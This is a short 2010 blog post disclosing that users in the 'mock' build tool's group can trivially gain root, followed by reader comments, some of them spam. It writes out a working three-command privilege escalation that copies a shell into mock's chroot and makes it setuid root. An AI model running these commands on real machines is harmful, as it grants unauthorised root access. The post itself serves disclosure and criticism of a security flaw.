2010-11-09

Doesn't Anyone Think This Is a Problem?

I can trivially get root on a machine if the user is member of the 'mock' group.

$ /usr/bin/mock -r epel-5-i386 --copyin /bin/sh /
$ /usr/bin/mock -r epel-5-i386 --shell 'chmod 4755 /sh'
$ /var/lib/mock/epel-5-i386/root/sh
#

In order to use mock properly, you have to be in the mock group. It just doesn't work properly even with sudo unless you're in that group. Once you're in that group, you can elevate privs in the chroot it creates and run arbitary scripts.

I did a quick google and I can't even find anything with keywords like "mock is a gigantic security hole because mock has lots of suid root stuff in it that lets you trivially root a machine if you've ever gotten it to work properly in the past."

It doesn't make any sense to me. Talking to two admins today led me to conclude that they both knew about this problem, and thought it wasn't an issue.

4 comments:

glyph said...

Wow. Shouldn't there be a CVE for this?

Alan said...

This is probably true whenever you install mock on your own machine and you're just being told to "add a user to the mock group" and you feel safe for adding somebody to that group, without letting him being root.

I've never made that supposition - I usually directly give root permissions to people who needs to use mock.

The "real issue" is that mock lies about making people "feel secure" because somebody is in the mock group and not root. This would probably deserve a ticket.

zerrin dogan said...

This is probably true whenever you install mock on your own machine and you're just being told to "add a user to the mock group" and you feel safe for adding somebody to that group, without letting him being root. good turk yıldızından zerrin dogan...

cocinas exclusivas said...

this is not a problem that cannot be solved...:)